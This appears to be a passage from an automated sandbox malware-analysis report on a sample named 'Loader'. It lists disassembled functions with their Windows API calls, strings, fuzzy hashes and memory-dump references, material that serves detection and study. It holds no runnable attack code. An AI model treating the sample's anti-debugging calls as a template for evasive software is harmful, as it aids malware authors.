Instruction Fuzzy Hash: D1E06DB126662167DB216BA69D04B9E3A5CAF41FA0F15C161FC2D961D0DF60DC00D9B1

Function 00A698F0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00A6990F

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: c36b69a8fe21c4fee9501f37152689ecb08cb6c96988a2c613a2ae8d8f79fb63
Instruction ID: a936ecc5425d730dfc12ed88d49e0d03e84e86661cec220357ad195c585d9b9d
Opcode Fuzzy Hash: c36b69a8fe21c4fee9501f37152689ecb08cb6c96988a2c613a2ae8d8f79fb63
Instruction Fuzzy Hash: D6D0A73A7110244F4B15BB68B91486E73A5FFC8B20356046EE851D7355CB34DC4287D0

Non-executed Functions

Function 00A87792 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00A879A9

Strings

1#IND, xrefs: 00A87897
1#QNAN, xrefs: 00A878A5
1#INF, xrefs: 00A878C8
1#SNAN, xrefs: 00A8789E

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 85faf14597102a3bcf8e0708950fae12390d2f67da74999cfaf2ce40f067817c
Instruction ID: 4b6584185de7520e20840a2c5b86389531394153c03ff56da80aaab22dc7aa3c
Opcode Fuzzy Hash: 85faf14597102a3bcf8e0708950fae12390d2f67da74999cfaf2ce40f067817c
Instruction Fuzzy Hash: 85D22672E082298FDB65DF28CD44BEAB7B5EB44344F5441EAD40DE7240EB78AE858F41

Function 00A81A07 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00A813BD,00000002,00000000,?,?,?,00A813BD,?,00000000), ref: 00A81AA0
GetLocaleInfoW.KERNEL32(?,20001004,00A813BD,00000002,00000000,?,?,?,00A813BD,?,00000000), ref: 00A81AC9
GetACP.KERNEL32(?,?,00A813BD,?,00000000), ref: 00A81ADE

Strings

OCP, xrefs: 00A81A5B
ACP, xrefs: 00A81A25

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 47cbf9afaa400a01a0d178d794edea5d8a7b7e3aa207ba30393524f5181ce3ad
Instruction ID: f3a3c339105a04fc864aaafe16e605ec371b9e0530cff40077efbe93b58ca208
Opcode Fuzzy Hash: 47cbf9afaa400a01a0d178d794edea5d8a7b7e3aa207ba30393524f5181ce3ad
Instruction Fuzzy Hash: E7218672B02100AAEB3DEF64C901A97F3AEEF54FD4B968465E90AD7104E732DD42C350

Function 00A81287 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A7C16A: GetLastError.KERNEL32(?,?,00A75495,00A98E38,0000000C), ref: 00A7C16E
Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000), ref: 00A7C210

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00A8138F
IsValidCodePage.KERNEL32(00000000), ref: 00A813CD
IsValidLocale.KERNEL32(?,00000001), ref: 00A813E0
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00A81428
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00A81443

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: bc4839cbcc899dd5e7d3c48f4c4daf35d37c579f20b195abf4c5100e8d264a98
Instruction ID: 75313aa3c67ed755d0fa03882aff39850491ab4a549f03f296c0b854ce07372f
Opcode Fuzzy Hash: bc4839cbcc899dd5e7d3c48f4c4daf35d37c579f20b195abf4c5100e8d264a98
Instruction Fuzzy Hash: 84516CB1A00219ABEB20EFA5DD45EBE77BCFF05740F544429F915EB190EB709A428B60

Function 00A79CC0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
Instruction ID: fd8cd92b472d63cb3222eb019da2d4f960f3aaaa87cb0d36c90cea5f3dd368b0
Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
Instruction Fuzzy Hash: 4D023C71E012199BDF14CFA9CD80AAEB7B5FF98314F24C26AD519E7341D731A941CB90

Function 00A81FE9 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A820D9

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 46578a468947b71f47189eb081633dd97488fba93f09b4131e9c3606703465c9
Instruction ID: 6c5c6b2e54414649ba7908a5b7780143076792ce42a72b28e6608f1eb6dd454f
Opcode Fuzzy Hash: 46578a468947b71f47189eb081633dd97488fba93f09b4131e9c3606703465c9
Instruction Fuzzy Hash: D271D1B1905168AEDF21FF649D8DBFAB7B9AF05300F1482DAE548A7251EB314E858F10

Function 00A6F8E9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00A6F8F5
IsDebuggerPresent.KERNEL32 ref: 00A6F9C1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A6F9DA
UnhandledExceptionFilter.KERNEL32(?), ref: 00A6F9E4

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 914e706b6d3369d806d90a80cd78db4af98297183f8037acd38a152d37cc6cef
Instruction ID: 52f410eaa349c78825ceb16ab6e5e30e719a5c3727eb7543ceed0797c9f5862b
Opcode Fuzzy Hash: 914e706b6d3369d806d90a80cd78db4af98297183f8037acd38a152d37cc6cef
Instruction Fuzzy Hash: 7D31F7B5D012199BDF21DFA4DD497CDBBB8AF08300F1041EAE40CAB250EB719A858F45

Function 00A81580 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00A7C16A: GetLastError.KERNEL32(?,?,00A75495,00A98E38,0000000C), ref: 00A7C16E
Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000), ref: 00A7C210

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A815D4
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A8161E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A816E4

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 41ade4927a0e8ec5afbf90713e43f983407b4ce340ad8f6a5361e52d8bb30660
Instruction ID: d2825035c6c0ecd0a89f33718dcf555c8d79d12692805b54054ed5dc70c652cb
Opcode Fuzzy Hash: 41ade4927a0e8ec5afbf90713e43f983407b4ce340ad8f6a5361e52d8bb30660
Instruction Fuzzy Hash: 80619C71A002079FDB28AF28CD82BBA77ACEF04710F1481BAE905D6185FB34D992DF50

Function 00A77E30 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A77F28
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A77F32
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00A77F3F

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2040d7eb5586652b61b23dc2479bfda5403e63c77a990fbfbf60c363c6b71f42
Instruction ID: 9a6a02a11d905d2edae6ae734cc74f8779a0330817be509cd08818892fd5f9b4
Opcode Fuzzy Hash: 2040d7eb5586652b61b23dc2479bfda5403e63c77a990fbfbf60c363c6b71f42
Instruction Fuzzy Hash: 7A31A27490122DABCB21DF64DD8978DBBB8BF18310F5081EAE41CA7251EB709F858F55

Function 00A700B4 Relevance: 3.0, APIs: 2, Instructions: 27timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32 ref: 00A700EC
GetSystemTimeAsFileTime.KERNEL32(?,A877E463,00A68E30,?,00A8BE77,000000FF,?,00A6FDB4,?,00000000,00000000,?,00A6FDD8,?,00A68E30,?), ref: 00A700F0

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: Time$FileSystem$Precise
String ID:
API String ID: 743729956-0
Opcode ID: 722e6e83703174ef931c2c05566650e5ae34409dbb14fea3f953b1ad6f5466ff
Instruction ID: 4157d752fd3eb1a1e36dcf94fa22bf6917a65d10bb96580ec22c95516a2e9761
Opcode Fuzzy Hash: 722e6e83703174ef931c2c05566650e5ae34409dbb14fea3f953b1ad6f5466ff
Instruction Fuzzy Hash: 03F03036A44A54EFC701DF98DC44F6ABBA8FB08B60F00852BE81297690DB3569019B90

Function 00A85C5E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A85BB9,?,?,00000008,?,?,00A8BCAB,00000000), ref: 00A85E8B

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 3eb0e36479900f3d6f7a9f5e36aa821c734cc5ffc5c8a3df56caa13d8f1f58e6
Instruction ID: c45194b0aa5fb04c7f414f0aa7eddc6c9a25e626732b9c82a36c3682e287a55c
Opcode Fuzzy Hash: 3eb0e36479900f3d6f7a9f5e36aa821c734cc5ffc5c8a3df56caa13d8f1f58e6
Instruction Fuzzy Hash: DAB14C31A10A089FD715DF28C48AB657BE0FF45364F298698ED99CF2A1C735ED81CB40

Function 00A6F555 Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00A6F56B

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 16acd8c2cccd124bef1a2d158b17534f861af023daf925aec0f6f9c27c642e14
Instruction ID: 84badf095453c697ce4f6cfe49946d9d194d095cced1aa1e26efa6fa1eeac607
Opcode Fuzzy Hash: 16acd8c2cccd124bef1a2d158b17534f861af023daf925aec0f6f9c27c642e14
Instruction Fuzzy Hash: 6EA18BB2A216058FDB18CF98F98569DBBF5FB48324F24C12BD411E7260D7749982CFA0

Function 00A81F38 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A7D2B4: HeapAlloc.KERNEL32(00000008,?,?,?,00A7C1B7,00000001,00000364,?,00000005,000000FF,?,00A75495,00A98E38,0000000C), ref: 00A7D2F5

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A820D9
FindNextFileW.KERNEL32(00000000,?), ref: 00A821CD
FindClose.KERNEL32(00000000), ref: 00A8220C
FindClose.KERNEL32(00000000), ref: 00A8223F

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: Find$CloseFile$AllocFirstHeapNext
String ID:
API String ID: 2701053895-0
Opcode ID: 6d8e5291a1677c80c1e5c31f32aaa59c7f36fb50781e3b21b5f656dee4196eb8
Instruction ID: 1ad5472dfc660bb1bb68efa39aff40c5912c3b841945180e54bb77a3529c2626
Opcode Fuzzy Hash: 6d8e5291a1677c80c1e5c31f32aaa59c7f36fb50781e3b21b5f656dee4196eb8
Instruction Fuzzy Hash: 4B5156B1904118AFDF24BF689C85AFEB7BDDF45354F2481AAF50897201EB308D429B60

Function 00A81840 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00A7C16A: GetLastError.KERNEL32(?,?,00A75495,00A98E38,0000000C), ref: 00A7C16E
Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000), ref: 00A7C210

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A81894

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: baaf47150bbbd5a8a68281479ad14a8f2a0f34468d36f419e55a9e3fb0f99ed3
Instruction ID: 4bcd92daeb4e7637cc9ab2ebd1c3638fd36b7bf2b2394ea9b8e084d0ee55b9a3
Opcode Fuzzy Hash: baaf47150bbbd5a8a68281479ad14a8f2a0f34468d36f419e55a9e3fb0f99ed3
Instruction Fuzzy Hash: F321A472610206ABDB28AF65DD52ABA77ACEF04721F10807EFD06D7141EB34ED42DB50

Function 00A73FB2 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

0, xrefs: 00A74136

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 1e150af34a3af3241bc890eebdd96e948ab1bd4efae72abc7a21114e9a46b410
Instruction ID: 7956b5fbe42996c711c533d285beb1335201ed56743e15c31e63f8cc31728d2f
Opcode Fuzzy Hash: 1e150af34a3af3241bc890eebdd96e948ab1bd4efae72abc7a21114e9a46b410
Instruction Fuzzy Hash: D1B1D030A0060A8BCB24DF68CE55ABFBBB5AF4D300F14C61DE65E97691C7359E42CB91

Function 00A814D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A7C16A: GetLastError.KERNEL32(?,?,00A75495,00A98E38,0000000C), ref: 00A7C16E
Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000), ref: 00A7C210

EnumSystemLocalesW.KERNEL32(00A81580,00000001,00000000,?,-00000050,?,00A81363,00000000,-00000002,00000000,?,00000055,?), ref: 00A8154A

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 675a8e5ca6f2d719b79afe7d8bbc4db00a5422ec0922b41f8c4f548a5cabad96
Instruction ID: 0282186f38beef66134642a5877b65951fc621b90abcc37735ed7e392b1eb8d5
Opcode Fuzzy Hash: 675a8e5ca6f2d719b79afe7d8bbc4db00a5422ec0922b41f8c4f548a5cabad96
Instruction Fuzzy Hash: 8311C2362007015FDB18AF3998A1ABABB95FF80768B14882DE98787A40E771A943C740

